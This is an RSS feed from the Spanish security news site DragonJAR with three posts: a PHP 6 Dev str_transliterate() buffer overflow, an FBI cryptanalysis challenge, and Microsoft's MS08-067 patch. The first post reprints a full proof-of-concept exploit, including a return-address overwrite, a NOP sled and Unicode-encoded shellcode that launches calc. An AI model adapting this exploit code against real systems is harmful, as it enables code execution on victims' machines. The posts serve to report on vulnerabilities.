<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Codigo</title> <atom:link href="http://www.dragonjar.org/tag/codigo/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Buffer Overflow en PHP 6 Dev</title><link>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml</link> <comments>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml#comments</comments> <pubDate>Mon, 03 May 2010 07:48:30 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0day]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[PHP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4248</guid> <description><![CDATA[Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web. El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada [...]]]></description> <content:encoded><![CDATA[<p>Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a> 6, el lenguaje de programación mas utilizado para realizar aplicaciones web.</p><p
style="text-align: center;"><img
class="alignnone" src="http://i.imgur.com/p7dDW.jpg" alt="p7dDW Buffer Overflow en PHP 6 Dev" width="500" height="273" title="Buffer Overflow en PHP 6 Dev" /></p><p>El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a> de código por medio de un buffer overflow.<span
id="more-4248"></span></p><p>Les dejo una <a
href="http://www.exploit-db.com/exploits/12051">PoC que explota esta vulnerabilidad </a>sobre servidor Apache, corriendo en <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> <a
href="http://www.dragonjar.org/tag/xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XP">XP</a> SP3 y permite ejecutar la calculadora del sistema:</p><blockquote><p><code># Title: PHP 6.0 Dev str_transliterate() <a
href="http://www.dragonjar.org/tag/0day" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con 0day">0Day</a> Buffer Overflow <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">Exploit</a><br
/> # EDB-ID: 12051<br
/> # CVE-ID: ()<br
/> # OSVDB-ID: ()<br
/> # Author: Pr0T3cT10n<br
/> # Published: 2010-04-04<br
/> # Verified: yes<br
/> # Download Exploit Code<br
/> # Download Vulnerable app</code></p><p><code>&lt;?php<br
/> error_reporting(0);<br
/> #####################################################################<br
/> ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit<br
/> ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev<br
/> ## Buffer Overflow<br
/> ## <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">Bug</a> discovered by Pr0T3cT10n, &lt;pr0t3ct10n@gmail.com&gt;<br
/> ## Exploited by TheLeader, Debug<br
/> ## SP. Thanks: HDM<br
/> ## http://www.nullbyte.org.il<br
/> #####################################################################<br
/> ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC<br
/> ## Take a look, 'unicode.semantics' has to be on!<br
/> ## php.ini &gt; unicode.semantics = on<br
/> #####################################################################<br
/> if(ini_get_bool('unicode.semantics')) {<br
/> $buff = str_repeat("\u4141", 256);<br
/> $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll<br
/> $nops = str_repeat("\u9090", 20);</code></p><p><code># WinExec Calc XP SP3 HEB Unicode-encoded shellcode<br
/> $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code># WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)<br
/> # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code>$exploit = $buff.$eip.$nops.$shellcode;<br
/> str_transliterate(0, $exploit, 0);<br
/> } else {<br
/> exit("Error! 'unicode.semantics' has be on!\r\n");<br
/> }</code></p><p><code>function ini_get_bool($a) {<br
/> $b = ini_get($a);<br
/> switch (strtolower($b)) {<br
/> case 'on':<br
/> case 'yes':<br
/> case 'true':<br
/> return 'assert.active' !== $a;<br
/> case 'stdout':<br
/> case 'stderr':<br
/> return 'display_errors' === $a;<br
/> default:<br
/> return (bool) (int) $b;<br
/> }<br
/> }<br
/> ?&gt;</code></p></blockquote><p>Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.</p><p><strong>Mas Información:</strong><br
/> <a
title="Permanent Link: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit" rel="bookmark" href="http://www.offensive-security.com/backtrack/php-6-0-dev-str_transliterate-0day-buffer-overflow-exploit/">PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit</a><br
/> <a
onclick="javascript:pageTracker._trackPageview('/outbound/article/www.exploit-db.com');" href="http://www.exploit-db.com/exploits/12051">Codigo en exploit-db.com</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml" title="Memorias del Black Hat USA 2010">Memorias del Black Hat USA 2010</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/exploit-0day-para-internet-explorer-en-windows-7.xhtml" title="Exploit 0day para Internet Explorer en Windows 7">Exploit 0day para Internet Explorer en Windows 7</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>FBI: ¿Puedes romper un código?</title><link>http://www.dragonjar.org/puedes-crackear-un-codigo-del-fbi-criptoanalisis.xhtml</link> <comments>http://www.dragonjar.org/puedes-crackear-un-codigo-del-fbi-criptoanalisis.xhtml#comments</comments> <pubDate>Fri, 29 May 2009 12:43:34 +0000</pubDate> <dc:creator>Cortex</dc:creator> <category><![CDATA[Criptografia]]></category> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Crackear]]></category> <category><![CDATA[Criptoanalisis]]></category> <category><![CDATA[Delincuente]]></category> <category><![CDATA[FBI]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2354</guid> <description><![CDATA[Y esta vez el FBI ha creado un nuevo reto de criptoanálisis. Ya lo habían hecho anteriormente (Noviembre de 2007 y Diciembre de 2008) cuando nos daban un código que debíamos de desentrañar y revelar el mensaje que contenía al igual que lo hacen los criptoanalistas en sus laboratorios. Esta vez es el mismo objetivo [...]]]></description> <content:encoded><![CDATA[<p>Y esta vez el <strong><a
href="http://www.dragonjar.org/tag/fbi" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con FBI">FBI</a></strong> ha creado un nuevo <strong>reto</strong> de <strong>criptoanálisis</strong>. Ya lo habían hecho anteriormente (<a
title="Noviembre 2007 Challenge FBI" href="http://www.fbi.gov/page2/nov07/code112107.html">Noviembre de 2007</a> y <a
title="December 2008 FBI Challenge" href="http://www.fbi.gov/page2/dec08/code_122908.html">Diciembre de 2008</a>) cuando nos daban un código que debíamos de desentrañar y revelar el mensaje que contenía al igual que lo hacen los criptoanalistas en sus laboratorios.<span
id="more-2354"></span></p><p>Esta vez es el mismo objetivo pero han usado un set de caracteres completamente diferentes &#8212; antiguas runas que a veces son usados por los delincuentes para codificar sus comunicaciones.</p><p>En caso de que quieras estudiar un poco las bases de los <strong>sistemas de cifrado</strong> y como romperlos puedes consultar el artículo creado por ellos: &#8220;<span><a
href="http://www.fbi.gov/hq/lab/fsc/backissu/jan2000/olson.htm">Analysis of Criminal Codes and Ciphers</a>.&#8221; Sí eres nuevo en el tema lo más recomendado es empezar con el <a
href="http://www.fbi.gov/kids/k5th/jobs9.htm">código en la página de principiantes</a>.</span></p><p><span>El código a romper es el siguiente:</span></p><p
style="text-align: center;"><span><img
class="aligncenter" title="Código FBI" src="http://img8.imageshack.us/img8/4926/code051809.jpg" alt="code051809 FBI: ¿Puedes romper un código?" width="500" height="257" /></span></p><p
style="text-align: left;"><span><a
title="Código a crackear criptoanálisis FBI" href="http://www.dragonjar.org/puedes-crackear-un-codigo-del-fbi-criptoanalisis.xhtml">Buena suerte crackeando el código!</a></span></p><p
style="text-align: left;"><span><strong>Actualización:</strong> Al parecer varios usuarios ya han logrado romper el código. <strong>VIERITO5</strong> por medio de los comentarios nos ha informado de que además <a
title="Reto FBI Mayo 09" href="http://vierito.es/wordpress/2009/05/29/reto-fbi-mayo-09/">publicó en su blog un artículo mostrando como fué que lo logró</a>. <strong>¡Felicitaciones a el y a todos los que lo han logrado!</strong><br
/> </span></p><p
style="text-align: left;"><span><strong>Enlaces</strong></span></p><ul><li><span><a
href="http://www.fbi.gov/page2/may09/code_052309.html">Entrada oficial sobre el reto: FBI</a></span></li><li><a
href="http://www.fbi.gov/page2/april06/cryptanalysis041206.htm">A 400-Year History of Cryptanalysis</a></li><li><a
href="http://www.fbi.gov/page2/march07/zodiac030207.htm">The Zodiac Killer Case</a></li><li><a
href="http://www.fbi.gov/hq/lab/html/rrau1.htm">Cryptanalysis in the FBI Lab</a></li></ul><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/www-megaupload-com.xhtml" title="www.megaupload.com y su bloqueo">www.megaupload.com y su bloqueo</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a
href="http://www.dragonjar.org/como-crackear-aplicaciones-de-la-mac-app-store.xhtml" title="Como crackear aplicaciones de la Mac App Store">Como crackear aplicaciones de la Mac App Store</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-routers-thomson-a-fondo.xhtml" title="Vulnerabilidad en Routers Thomson a Fondo">Vulnerabilidad en Routers Thomson a Fondo</a></li><li><a
href="http://www.dragonjar.org/revisa-tu-privacidad-en-facebook.xhtml" title="Revisa tu privacidad en Facebook">Revisa tu privacidad en Facebook</a></li><li><a
href="http://www.dragonjar.org/kits-de-crackeo-wireless-en-china.xhtml" title="Kits de crackeo wireless en china">Kits de crackeo wireless en china</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/puedes-crackear-un-codigo-del-fbi-criptoanalisis.xhtml/feed</wfw:commentRss> <slash:comments>11</slash:comments> </item> <item><title>Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</title><link>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml</link> <comments>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml#comments</comments> <pubDate>Thu, 23 Oct 2008 22:02:44 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[2008]]></category> <category><![CDATA[7]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Parche]]></category> <category><![CDATA[Remoto]]></category> <category><![CDATA[Vista]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[XP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1341</guid> <description><![CDATA[Microsoft acaba de publicar un parche que corrige una vulnerabilidad que cataloga como &#8220;critica&#8221; y afecta todos los sistemas Windows (desde Windows 2000 a Vista, pasando por XP, 2003, 2008 e incluso el futuro Windows 7 aun en pruebas). El alcance del fallo depende del sabor de Windows que utilice el sistema atacado, Los mas [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> acaba de publicar un <a
href="http://www.dragonjar.org/tag/parche" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Parche">parche</a> que corrige una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> que cataloga como &#8220;critica&#8221; y afecta todos los sistemas <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> (desde <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> 2000 a <a
href="http://www.dragonjar.org/tag/vista" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vista">Vista</a>, pasando por <a
href="http://www.dragonjar.org/tag/xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XP">XP</a>, 2003, 2008 e incluso el futuro Windows 7 aun en pruebas).</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img503.imageshack.us/img503/2615/bugbr9.jpg" alt="bugbr9 Microsoft Publica parche que corrige Vulnerabilidad Critica"  title="Microsoft Publica parche que corrige Vulnerabilidad Critica" /></p><p>El alcance del fallo depende del sabor de Windows que utilice el sistema atacado, Los mas afectados son los Sistemas Windows 2000, XP y 2003 ya que esta vulnerabilidad proporciona el control total de forma remota  al sistema víctima a través de los recursos compartidos, facilitando la <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a> de código malicioso y todo esto sin necesidad autenticación ni participación alguna por parte del usuario de la máquina atacada, lo que  deja el terreno abonado para que un gusano automatice el ataque y cause grandes daños.<span
id="more-1341"></span></p><p>De momento la solución recomendada es actualizar nuestro sistema tan pronto como sea posible utilizando el Windows Update, tener un buen Firewall en nuestra maquina (Al parecer, el firewall de SP2 evita el ataque, siempre que esté activado y no esté habilitada la compartición de ficheros e impresoras); El panorama es mas &#8220;alentador&#8221; para los sistemas Microsoft Windows Vista y 2008 Server, ya que al parecer sólo es posible provocar denegaciones de servicio.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://blogs.technet.com/seguridad/archive/2008/10/23/ms08-067-liberado.aspx">Informacion Tecnica del Parche MS08-067</a><br
/> <a
href="http://blogs.technet.com/msrc/archive/2008/10/22/advance-notification-for-out-of-band-release.aspx">Anuncio en el blog de Technet</a><br
/> Otros portales que hablan del fallo: <a
href="http://www.kriptopolis.org/microsoft-lanza-parche-urgente">Kriptopolis</a>, <a
href="http://www.hispasec.com/unaaldia/3652">Hispasec</a>, <a
href="http://www.seguridad.unam.mx/vulnerabilidadesDB/?vulne=5667">seguridad.unam.mx</a>, <a
href="http://www.blogantivirus.com/actualizacion-critica-ms08-067-para-microsoft-windows">BlogAntivirus</a>, <a
href="http://www.frsirt.com/english/advisories/2008/2902">FrSIRT</a>, <a
href="http://www.que20.com/2008/10/23/vulnerabilidad-critica-en-microsoft-windows-ms08-067/">Q2.0</a>, <a
href="http://www.cgisecurity.org/2008/10/emergency-micro.html">cgisecurity</a>, <a
href="http://seguridaddescifrada.blogspot.com/2008/10/parche-de-severidad-alta-ms08-067.html">seguridaddescifrada</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title="Recuperar contraseña windows 7, Vista, XP y Anteriores">Recuperar contraseña windows 7, Vista, XP y Anteriores</a></li><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a
href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 11/47 queries in 0.037 seconds using disk: basic
Object Caching 1375/1425 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 22:05:30 -->
